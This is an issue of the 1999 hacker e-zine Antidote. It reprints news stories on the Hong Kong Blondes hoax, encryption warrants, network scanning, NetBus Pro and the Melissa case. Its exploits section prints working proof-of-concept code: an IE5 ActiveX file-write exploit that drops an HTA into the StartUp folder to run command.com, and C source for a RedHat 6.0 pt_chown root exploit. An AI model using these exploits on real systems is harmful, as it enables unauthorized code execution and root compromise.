Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 14
Volume 2 Issue 14
8/28/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** * ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.security-source.net/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lyn 1t.\n";
------------------------------
We normally don't do this, but please visit www.security-source.net/lordoak/hkattmp/
and check out the "Attempted Hack", it is soooo funny!
In this issue of Antidote, we have over 750 subscribers and getting more everyday! The
only thing that we ask of you when you read Antidote, is that you go to:
www.security-source.net/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.
-)!-- Contents //--(-
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Authors
0.04 - Shouts
0.05 - Writing
1.00 - News
1.01 - The Hacker Hoax
1.02 - Feds want to Crack personal Computers
1.03 - Scanning for Trouble
1.04 - UA Sets the Rcord Straight on NetBus Pro
1.05 - IE5 Bug the Worst Ever?
1.06 - Melissa Virus creator Admits to Guilt
1.07 - Cult claims Hong Kong hackers are real threat
2.00 - Exploits (new & older)
2.01 - ie5.exec_programs.txt
2.02 - rh60.pt_chown.root.c.txt
2.03 - aix.pdnsd.bof.txt
3.00 - Misc
TIP.I - Tip of the issue/week thanks to akira_54.
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plane making fun of something or someone.
FEAT.S - FEATURED SITES:
browse.security-source.net
www.403-security.org
www.hackernews.com
------------------------------
-)!-- 0.00 - Beginning //--(-
0.01 -)What?(-
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current information
and exploits. Mainly Antidote is just a magazine for people to read if they have some
extra time on there hands and are bored with nothing to do. If you want to read a maga-
zine that teaches you how to hack etc, then you might want to go to your local book-
store and see if they carry '2600'.
------------------------------
0.02 -)FAQ(-
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
to be published above your article (when sending it to us) and we will do what you
say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you
might want to send it again because we probably didn't get it (we respond to all e-
mails no matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 -)Authors(-
Lord Oak is the founder of Antidote. Most work was done by him in Vol1 issues 1-5 and
Vol2 issues 1-13. Though, he is no longer with us.
OptikNerve Current president of Antidote and security-source.net / thepoison.org. Most
work being done in Vol2 issues 14+ is done by him. Feel free to e-mail him
at: optiknerve@security-source.net.
Duece is the co-founder and co-president of Antidote, some work is done by him
when he comes online. Feel free to e-mail him at: duece@security-source.net
ox1dation not really an author, just someone that helps us out a lot and we consider
him as an author! His e-mail address is: ox1dation@security-source.net
------------------------------
0.04 -)Shouts(-
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
OptikNerve Forlorn
Duece opt1mus
oX1dation PBBSER
lyp0x akira_54
Like we said above, if we forgot you and/or you think you should be added, please e-
mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.05 -)Writing(-
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on
writing something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if
we like it).
------------------------------
-)!-- 1.00 - News //--(-
1.01 -)The Hacker Hoax(- 8.23.99
[www.currents.net]
The world's press might have been fooled into believing that a Chinese hacker group
plans to bring down the country's information infrastructure. According to stories that
began circulating in July last year, the rogue group, the Hong Kong Blondes, is made up
of dissidents both overseas and within the Chinese Government.
The rumours began when an interview with the group's leader was published by US hacking
group the Cult of the Dead Cow (CDC) at http://www.cultdeadcow.com . In the interview,
illusive Hong Kong Blondes director Blondie Wong said that he had formed an organiza-
tion named the Yellow Pages, which would use information warfare to attack China's in-
formation infrastructure.
The group threatened to attack both Chinese state organizations and Western companies
investing in the country. For their part, the CDC claimed that they would train the
Hong Kong Blondes in encryption and intrusion techniques.
One year after the group's supposed launch, there is no evidence that the Hong Kong
Blondes ever existed. In fact, all evidence appears to indicate that the Hong Kong
Blondes report was a highly successful hoax.
The story was first reported in Wired magazine, and during the past year has been fo-
llowed up by numerous publications including USNews, the Los Angeles Times, Asiaweek
and ComputerWorld. In every case, the original source was the CDC's July interview.
The CDC is best known for its remote administration tool Back Orifice. BO can be in-
stalled on a Windows PC without the user's knowledge, giving full control over the
machine to unauthorized third parties.
The first version of Back Orifice was released a month after the Blondes story was
leaked to Wired magazine.
Repeated attempts to contact the CDC failed to elicit a response, and despite inquiries
throughout the Hong Kong technology and security industries, not one person contacted
had ever come across any evidence of the group's existence.
The Hong Kong Police, which is responsible for tracking hacking activities locally, had
no knowledge of the group. Detective senior inspector Martyn Purbrick, of the Commer-
cial Crime Bureau's Computer Crime Section, said that there had been no official re-
ports of the group's activities. He added that he only knew the group's name through
reports in the media.
Stephen Mak, principal assistant secretary of the information technology and broadcast-
ing bureau, said, "We have carried out inquiries both within the government as well as
with the ISPA, but we could find no information about the group."
Samuel Chanson, director of the Cyberspace Centre at the Hong Kong University of Sci-
ence and Technology, said the threats would take no great skill to carry out. "Hacking
into almost any major server is do-able with some training."
Chanson said that a group of his undergraduate students took a two-day course in intru-
sion techniques, after which they were able to break into several hundred servers in
campus tests. "We checked how good their network security was and succeeded in bringing
down a good number of their servers as well as gaining important information... Attack-
ing the general commercial server is not a difficult task."
Early this year, a US hacker group, the Legion of the Underground (LoU) at
http://www.legions.org , launched a declaration of infowar on China, in response to the
harsh penalties handed out for computer offenses in the country. LoU members cited the
Hong Kong Blondes as an influence behind their short-lived war, which was abandoned
following condemnation from other hacker groups. However, a large number of Chinese Web
sites were hacked by protesters, including Hongkong.com, China Window, Wenjin Software
and the semi-official China Society for Human Rights Studies.
CDC remains tight-lipped on the issue. But publishers might do well to remember a
statement made by the group in its Media Domination Global Update: "We intend to domi-
nate and subvert the media wherever possible."
http://www.currents.net/newstoday/99/08/18/news3.html
------------------------------
1.02 -)Feds want to Crack personal Computers(- 8.23.99
[www.cnn.com]
The Clinton administration reportedly plans to ask Congress to give police authority to
secretly go into people's personal computers and crack their security codes.
Legislation drafted by the Justice Department would let investigators get a sealed war-
rant from a judge to enter private property, search through computers for passwords and
override encryption programs, The Washington Post reported Friday.
The newspaper quoted an August 4 department memo that said encryption software for
scrambling computer files "is increasingly used as a means to facilitate criminal ac-
tivity, such as drug trafficking, terrorism, white-collar crime and the distribution of
child pornography."
Under the measure, investigators would obtain sealed search warrants signed by a judge
as a prelude to getting further court permission to wiretap, extract information from
computers or conduct further searches.
Privacy advocates have objected to the plan, dubbed the Cyberspace Electronic Security
Act by the Justice Department. "They have taken the cyberspace issues and are using it
as justification for invading the home," James Dempsey, an attorney for the Center for
Democracy and Technology, told the Post.
Peter Swire, the White House's chief counselor for privacy, told the newspaper the ad-
ministration supports encryption as a way to provide privacy for computer users.
"But it has to be implemented in a way that's consistent with other values, such as law
enforcement," Swire said. "In this whole issue we have to strike the right balance."
The administration has for years been seeking a law to require computer makers to in-
clude a so-called Clipper Chip in their products that would give police a "back door"
into computers despite any encryption software they may contain.
In a backlash, more than 250 members of Congress have signed on as co-sponsors to leg-
islation that would prohibit mandating such back-door devices on computers.
http://www.cnn.com/TECH/computing/9908/20/computer.codes.ap/index.html
------------------------------
1.03 -)Scanning for Trouble(- 8.24.99
[www.msnbc.com]
Every day they come, they lurk then they leave without doing damage. And Ruiu is power-
less to stop it. Every method he has tried, they have trumped. Theyre toying with him.
They must feel like gods, he says. They come at him through clients computers, through
Canadian ISPs, once even through one of the largest Canadian banks. They hack into Lin-
ux boxes, NT boxes, Unix boxes. Hack by day or night. No matter.
And all for no apparent reason. They look, but dont touch.
Ah, the life of a network administrator these days. There are thousands of ways to
break into a computer, and there are now several downloadable software packages design-
ed to scan the Internet for Web sites and servers that have just one flaw.
According to Peter Tippett at computer security research firm ICSA, a new box connected
to the Net will almost certainly be scanned before one week goes by. And the amount of
scanning activity has doubled in the past six months.
Thats about when the scanning started for Brandon Pepelea, a former employee at PSINet
who says his collection of Web sites has been scanned systematically several times a
week since January. In another example of a victimless probe, Pepelea thinks someone or
something has been banging through all the Internet addresses between 38.240.x.x and
38.200.x.x, a so-called Class-B range of addresses that constitute about 16,000 possi-
ble computers.
In his case, the scans were unsuccessful. Whoever or whatever it is, they havent been
able to break into Pepeleas computers. Still, the relentless, systematic nature of the
probe has him spooked. Hes been demanding that PSINet, which owns all the addresses in
the 38.x.x.x range, chase down the scanner and prosecute.
I dont think they understand how serious it is, Pepelea said. The threat not so much
being the nature of the scan but the scope of the scan If youre between 38.240 and
38.200 youve had the scans. Theyve walked through and gotten to you.
NOSE FOR TROUBLE
The attack itself involves use of the Simple Network Management Protocol, frequently
used on network routers. Pepelea owns machines between the 38.240 and 38.200 address
range, and concluded scans spanned that range by studying patterns of hits to his own
and his clients machines.
Dancing tantalizingly over the edge of the law, they show an ability to do far more
damage.
This is not the first time Pepelea, now CEO of a small security company he calls Des-
igners Dream, has done a hefty amount of personal cybersleuthing. Last December, he
compiled information on a virus writer named VicodinES, and shared it with the FBI, the
CIA and other law enforcement agencies. His tips fell on deaf ears, and VicodinES, who
the world now knows as Dave Smith, went on to release the Melissa virus. Pepeleas hell
bent on being heard this time around. Once again, nobody cares, he laments.
PSINet said early last week the scans were being generated by an account serviced by
the company, and that it had dealt with the matter by canceling the account. But by
Friday, the company had canceled three more accounts in an effort to stop the probes.
While officials there say they take the matter seriously, they are not convinced its
an organized hacker attack.
Its not possible to characterize whether this is a mistake, a malicious event, was
planned, or it just happened, said Cole Libby, Director of Network Engineering. For
example, it could a wrongly configured piece of hardware searching a section of the
Internet for a new printer. There are lots of examples of technology out of control in
the world.
NO HARM, NO FOUL?
Scanning, the cyberspace equivalent of walking down Main Street and jiggling handles to
see who leaves the front door unlocked, brings up murky legal issues. Entering someone
elses computer is illegal, but scanning, which amounts to asking a computer how its
been set up, probably isnt. Pepelea says PSINet told him to pursue legal action again-
st his cyberpest but for what? Meanwhile, Pepelea thinks PSINet should be liable if any
real trouble ever comes from his suspected hacker, particularly since the Net provider
was warned.
Thats not likely, says Internet law expert Dorsey Morrow. PSINet would almost certain-
ly face no criminal liability for the actions of a hacker on their network, and would-
nt likely face civil liability either.
As long as they can show We were doing everything we can. Weve got security policies
in place. Were using the latest software. That mounts up to a pretty good defense,
Morrow said.
So theres no consequences for scanning, either to the hacker or the company that prov-
ides the means. But what of Ruius hackers, who go just one step further than Pepeleas
scanners? They scan, then enter, lurk around, and leave. Dancing tantalizingly over the
edge of the law, they show an ability to do far more damage.
Their methods are painstakingly deliberate, designed to avoid detection. They launch
attacks from multiple sites, sometimes sending no more than a packet per day from any
site, in order to hide the kind of suspicious activity protective sniffer programs look
for.
We saw one new machine coming at us every five minutes, Ruiu said. They must have felt
like gods because they could break into any machine they wanted.
That includes a collection of Canadian ISPs, and even one major Canadian bank, the
hackers broke into. When he called, Ruiu often had a tough time convincing victimized
ISP administrators theyd been hacked.
The reaction of ISPs was disbelief, he said. One didnt believe us until a marketing
guy had his laptop taken out and it started sending weird packets.
Ruiu is convinced the hacks are coming from a coordinated team, because of their speed
and variety. But while the cat-and-mouse game continues, he can only speculate on mo-
tive. His company, a 15-person startup called Netsentry.net, is hardly a big target.
So Ruiu thinks his outside efforts in the security community are likely to blame. He
recently worked on project called Trinux, which aimed to create a security-enhanced
version of Linux that fits on one floppy disk. Among his partners was Ken Williams, who
until recently ran Packet Storm Security, perhaps the most popular reference site in
the hacker community.
I suspect these guys are targeting security software, he said, but added they have not
revealed their intentions. This is really bugging me. The lack of a motive really dis-
turbs me it gave me the creeps.
The attacks have also been humbling for Ruiu, who has spent a lot of time chasing the
hackers when he could be working to get his business off the ground.
There are a lot of assumptions were all making about Internet security that we
shouldnt, he said. Theres a lot of things we dont know.
For example, these hackers made a habit of hijacking machines Ruius computers normally
talked to, then initiated attacks from these supposedly friendly computers. That made
them almost impossible to detect.
If they get a machine thats close to your machine, thats almost as bad as taking over
your Web server. Its a great place to launch an attack on your firewall, he said.
Nothing about Ruiu or Pepeleas stories surprised ICSAs Tippett, who expects security
problems to get worse before they get better.
Its the wild, wild West out there, he said. The tools are pervasive and so common. The
chance of getting caught is pretty slim Our neighbors are now very close and enough of
them dont have a great social conscience.
http://www.msnbc.com/news/302835.asp#BODY
------------------------------
1.04 -)UA Sets the Rcord Straight on NetBus Pro(- 8.25.99
[www.ultraaccess.net]
UltraAccess.net, a leading software design and network consulting firm located in Jack-
sonville, Florida announced today that they are going to set the record straight on
their highly controversial product, NetBus Pro 2.10. With virtually no marketing push
the company has sold thousands of copies, acquired hundreds of corporate, federal, and
educational clients since its 2.0 release in mid-February. But all of this has not come
without its share of problems and NetBus has remained a product under siege.
NetBus has met resistance because many large anti-virus software companies have made
claims that the product is a hackers tool and are treating the program like a virus.
Because of this, NetBus is ultimately incompatible with many name-brand anti-virus pro-
grams. Anti-virus companies are knocking our product because its competition for their
remote administration software, says Judd Spence CEO of UltraAccess Networks Inc.
Whats worse is that our sales have been impacted because of this, and quite frankly,
we think this is defamation and restraint of trade.
NetBus Pro is a remote administration tool that is extremely easy to install and ena-
bles users to administrate remote computers within minutes. The product contains many
features for remote administration, such as the File Manager, Registry Manager, HTTP
Support, Telnet Support, and Application Redirect. In addition, NetBus Pro has added
features like Capture screen, Listen keyboard and Capture camera image for spying. All
these features, among several others, have been migrated into a single package. "It is
a commercial product and it looks extremely professionally written. You can use these
products for lawful or unlawful purposes," said Jan Hruska, technical director of So-
phos, a popular anti-virus software vendor.
NetBus users have found our product to be extremely useful because it has every feature
that our high-dollar competition has and much more" says Spence. In addition, we have
received numerous awards, including a 5 cow rating from TUCOWS, 5 stars from Supershar-
eware.com, and a #1 rating from DaveCentral.com.
Frustrated by the competitions stabs at their product's reputation, NetBus officials
say they are considering legal action. On its face, it looks like a good case, said at-
torney Mark Rubin, who has been retained by NetBus. The product belongs to a corpora-
tion. Its designed to do a function. Youve got another business telling people, You
cant use that product ... Youve got Symantec saying you shouldnt use NetBus Pro.
Thats the classic definition of an anti-competitive act.
NetBus has quickly developed a reputation as a company that is on the edge of becoming
a huge success. "Its pretty simple, we strive to provide an easy to use, high quality
product so users can get the job done without any guesswork," says Spence. NetBus Pro
is a totally legitimate remote administration tool and at only $15 a copy its less
han one-tenth the price of some of our big-name competitors such as PCAnywhere from Sy-
mantec Corp.
http://www.ultraaccess.net.
------------------------------
1.05 -)IE5 Bug the Worst Ever?(- 8.25.99
[www.internetnews.com]
Bulgarian browser bugmeister Georgi Guninski is at it again. The 27-year-old indepen-
dent computer consultant has discovered a new security flaw affecting Internet Explorer
5, which enables a malicious hacker to place a program on the victim's hard disk, to be
executed at the next reboot.
Guninski is credited by Microsoft with discovering and publicizing a number of signifi-
cant security flaws in its Internet Explorer browser in the past year. While he's also
spotted several security bugs in Netscape's Navigator, Guninski is especially fond of
poking holes in Active X, the scripting technology used in IE.
"I think this is the most significant of my discoveries and the most dangerous also,"
Guninski told InternetNews Radio. "It allows a Web page or e-mail message to take con-
trol of the computer and do anything."
According to Guninski, the attack can be launched by causing IE5 users to click on a
hyperlink on a web page, but it also can be transmitted by e-mail to users of Micro-
soft's Outlook 98. The exploit places an executable program in an HTML Application file
in a Window 95 or 98 computer's start-up folder. When the victim reboots his or her
computer, the program will execute.
Guninski said the problem lies in an Active X control called "Object for constructing
type libraries for scriptlets". He has posted a demo and source code of the exploit at
his Web site.
Microsoft officials were not immediately available for comment. Guninski asserts that
the company has reproduced the bug and plans to issue a patch. In the meantime, con-
cerned IE5 users can protect themselves by going into security tab of the browser's
Internet Options menu, and disabling ActiveX controls or plug-ins.
-)(See section 2.01 for the exploit)(-
http://www.internetnews.com/prod-news/print/0,1089,9_188461,00.html
------------------------------
1.06 -)Melissa Virus creator Admits to Guilt(- 8.26.99
[www.cnn.com]
The man charged with creating the Melissa computer virus that clogged e-mail systems
around the world admitted he created the bug, a prosecutor alleges in court papers.
David L. Smith, a former computer programmer, was arrested in April.
A brief filed in state Superior Court by Supervising Deputy Attorney General Christo-
pher G. Bubb says Smith waived his Miranda rights and spoke to investigators when po-
lice arrived at his apartment.
"Smith admitted, among other things, to writing the 'Melissa' macro virus, illegally
accessing America Online for the purpose of posting the virus onto cyberspace, and des-
troying the personal computers he used to post 'Melissa,' " Bubb wrote.
Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of Neptune that he dis-
putes Bubb's assertions. He refused to comment further, the newspaper reported today.
The Melissa virus was disguised as an e-mail marked "important message" from a friend
or colleague of each recipient. It caused affected computers to create and send 50
additional infected messages. The volume of messages generated slowed some systems to a
crawl.
Authorities say the virus was named after a topless dancer in Florida.
Bubb's brief was filed in response to a defense motion seeking additional prosecution
documents.
Borden says he needs the prosecution documents to file a motion to suppress evidence
seized during the search of Smith's apartment. A hearing on his motion was to be held
Wednesday afternoon.
Smith is charged with interruption of public communications, conspiracy and theft of
computer service. The maximum penalty for the offense is 40 years in prison.
He remains free on $100,000 bail.
http://www.cnn.com/US/9908/25/melissa.virus.ap/index.html
------------------------------
1.07 -)Cult claims Hong Kong hackers are real threat(- 8.26.99
[www.itdaily.com]
Leading US hacker group the Cult of the Dead Cow has told itdaily.com that elusive Chi-
nese hackers the Hong Kong Blondes are operating in Asia.
According to the CDC, the Blondes are a group of Chinese dissidents who aim to desta-
bilise the Chinese Government through the Internet. Along with an offshoot named the
Yellow Pages, the group threatened to use information warfare to attack China's infor-
mation infrastructure. The group threatened to attack both Chinese state-owned organi-
sations and Western companies investing in the country.
When the group was first reported, the CDC claimed to be training the Blondes in en-
cryption and intrusion techniques.
A recent investigation by itdaily.com found no evidence of the group's existence. De-
spite approaching the Hong Kong ISP Association, the Hong Kong Government, Police, uni-
versities, security experts and hackers alike, nobody contacted by itdaily.com knew
anything about the group.
However, CDC foreign minister OXblood Ruffin told itdaily.com that the Hong Kong
Blondes are for real, and that they are operating in Asia. The chief organisers, nick-
named Blondie Wong and Lemon Li, were last reported to be based in India.
"The Blondes do exist, although the CDC has truncated our official relationship with
them," said Ruffin. "The Yellow Pages on the other hand briefly existed but were shut
down by me."
Ruffin said that the reason the group has been so low-key is that they operate secretly
to avoid compromising members in China "They're hyper secure. They're organised in
cells of three members with no one but Blondie and Lemon knowing the entire member-
ship."
The CDC has portrayed the Hong Kong Blondes as "hacktivists"; meaning they break into
computer networks for political ends. "The Yellow Pages got together and they were
gonna do support work to draw attention to social justice issues in China linked to
current trading practices on the Western side..."
Ruffin said that he later learned that the group planned to shut down the networks of a
number of large US corporations, at which point he decided to disband the group and
disassociate himself with the Hong Kong Blondes.
"The American public would not have supported any such adventure and it would have
worked seriously against the cause," he said.
He added that the CDC no longer maintains any relationship with the group.
As previously reported in itdaily.com, the first and only Hong Kong Blondes interview
was leaked to the press by the CDC just one month before the group released its well-
known remote administration tool Back Orifice. BO can be installed on a Windows PC
without the user's knowledge, giving full control over the machine to unauthorised
third parties.
Since then, Back Orifice has become widespread internationally, particularly in China.
There is still no evidence beyond the word of OXblood Ruffin that the Hong Kong Blondes
do, in fact, exist, but as Ruffin's e-mail signature notes: "First we take the networks,
then we take Peking."
http://www.itdaily.com/daily.lasso?-database=dailybasepublic&-layout=today&-response=itdailyfree.htm&-recid=39830&-search
------------------------------
TIP.I -)Tip of the Week!(-
Eyes tired... burning from reading all those txt files?? Get a TTS (Text To Speech)
program, they really help. The best one for Windows I think is ReadPlease... There are
many for Linux so look around!
akira_54
------------------------------
-)!-- 2.00 - Exploits //--(-
2.01 -)ie5.exec_programs.txt(- 8.25.99
[www.nat.bg/~joro]
Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not
liable for any damages caused by direct or indirect use of the information or function-
ality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this program or any
derivatives thereof.
Description:
Internet Explorer 5.0 under Windows 95/98 (do not know about NT) allows executing ar-
bitrary programs on the local machine by creating and overwriting local files and putt-
ing content in them.
Details:
The problem is the ActiveX Control "Object for constructing type libraries for script-
lets".
It allows creating and overwriting local files, and more putting content in them.
There is some unneeded information in the file, but part of the content may be chosen.
So, an HTML Application file may be created, feeded with an exploit information and
written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the HTML Application
file will be executed.
This vulnerability can be exploited via email.
Workaround:
Disable Active Scripting or Disable Run ActiveX Controls and plug-ins.
The code is:
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>
http://www.nat.bg/~joro/scrtlb.html
------------------------------
2.02 -)rh60.pt_chown.root.c.txt(- 8.23.99
/* pt_chown for RedHat 6.0 has a vulnerability that can lead to
a root comprimise.
*/
int main(int a,char* b[]) {
char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n";
int i=0,x=open(b[1],1); // Expect writable, allocated
// (eg. by screen) /dev/ttyXX as 1st arg
if (x<0) {
perror(b[1]);
exit(1);
}
if (!fork()) {
dup2(x,3);
execl("/usr/libexec/pt_chown","pt_chown",0);
perror("pt_chown");
exit(1);
}
sleep(1);
for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]);
}
------------------------------
2.03 -)aix.pdnsd.bof.txt(- 8.18.99
A buffer overflow vulnerability has been discovered in the Source Code Browser's Pro-
gram Database Name Server Daemon (pdnsd) of versions 2 and 3 of IBM's C Set ++ for AIX.
This vulnerability allows local and remote users to gain root access.
------------------------------
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.
